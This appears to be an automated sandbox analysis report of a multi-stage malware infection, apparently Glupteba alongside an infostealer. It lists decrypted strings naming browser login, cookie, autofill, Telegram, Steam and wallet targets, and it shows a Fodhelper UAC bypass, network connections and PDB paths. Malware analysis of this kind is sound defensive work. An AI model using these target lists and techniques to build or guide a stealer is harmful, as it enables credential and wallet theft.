Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SelectObject
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: BitBlt
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GdipFree
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetDC
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: InternetOpenA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: StrStrA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: StrCmpCW
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RmStartSession
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RmRegisterResources
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RmGetList
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: RmEndSession
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: browser:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: profile:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: login:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: password:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Opera
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: OperaGX
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Network
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: cookies
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: FALSE
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: autofill
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: history
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: month:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Cookies
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Login Data
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: History
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: logins.json
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: usernameField
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: plugins
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Local Extension Settings
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: IndexedDB
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Opera Stable
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Opera GX Stable
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CURRENT
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: chrome-extension_
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Local State
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: chrome
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: opera
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: firefox
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: wallets
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ProductName
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: DisplayName
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ProcessorNameString
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: DisplayVersion
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Network Info:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: System Summary:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Installed Apps:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Current User:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Process List:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: system_info.txt
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: runas
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: files
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Telegram
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Password
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Pidgin
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: accounts.xml
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: config.vdf
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: 00000001
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: 00000002
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: 00000003
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: 00000004
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: token:
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Software\Valve\Steam
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SteamPath
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: DialogConfig.vdf
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: libraryfolders.vdf
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: loginusers.vdf
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: browsers
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: https
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: build
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: token
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: message
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE7DD20 CryptReleaseContext,	4_2_6CE7DD20
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE7DEE0 CryptReleaseContext,	4_2_6CE7DEE0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE7DE00 CryptGenRandom,__CxxThrowException@8,	4_2_6CE7DE00
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE7D9D0 CryptAcquireContextA,GetLastError,	4_2_6CE7D9D0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE7DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	4_2_6CE7DBB0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CEA35E0 CryptReleaseContext,	4_2_6CEA35E0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE7D7F0 CryptReleaseContext,	4_2_6CE7D7F0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE7D7D3 CryptReleaseContext,	4_2_6CE7D7D3

Privilege Escalation

UAC bypass detected (Fodhelper)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Registry value created: DelegateExecute
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Registry value created: NULL "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

Bitcoin Miner

Yara detected Glupteba

Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.3780000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2e90e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 7216, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Unpacked PE file: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Unpacked PE file: 31.2.nsa984B.tmp.exe.400000.0.unpack
Source: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	Unpacked PE file: 40.2.datapumpcrt.exe.400000.0.unpack

Source: uVQLD8YVk6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.140.225:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49844 version: TLS 1.2

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 4854.exe, 00000004.00000002.1911380987.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, 4854.exe, 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmp, 4854.exe, 00000004.00000002.1911380987.000000000493F000.00000004.00000800.00020000.00000000.sdmp, 928F.exe, 0000001C.00000002.2745320881.00000000692FD000.00000002.00000001.01000000.00000009.sdmp, 928F.exe, 0000001C.00000002.2549281666.0000000007034000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\zinazibemur\wemotugiw_cudeyatofo88\gajore\fozomupa96\m.pdb source: nsa984B.tmp.exe, 0000001F.00000000.2147347740.0000000000424000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000C7A000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000003709000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb`C source: 9E77.exe, 0000001E.00000000.2147800104.000000000044D000.00000002.00000001.01000000.0000001B.sdmp, 9E77.exe, 0000001E.00000003.2173350757.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000C7A000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000003709000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: dialer.exe, 00000022.00000003.2220836922.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdbW source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdbUGP source: dialer.exe, 00000022.00000003.2220836922.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Loader.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb source: 9E77.exe, 0000001E.00000000.2147800104.000000000044D000.00000002.00000001.01000000.0000001B.sdmp, 9E77.exe, 0000001E.00000003.2173350757.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000022.00000003.2208403295.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3078495334.0000000000E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
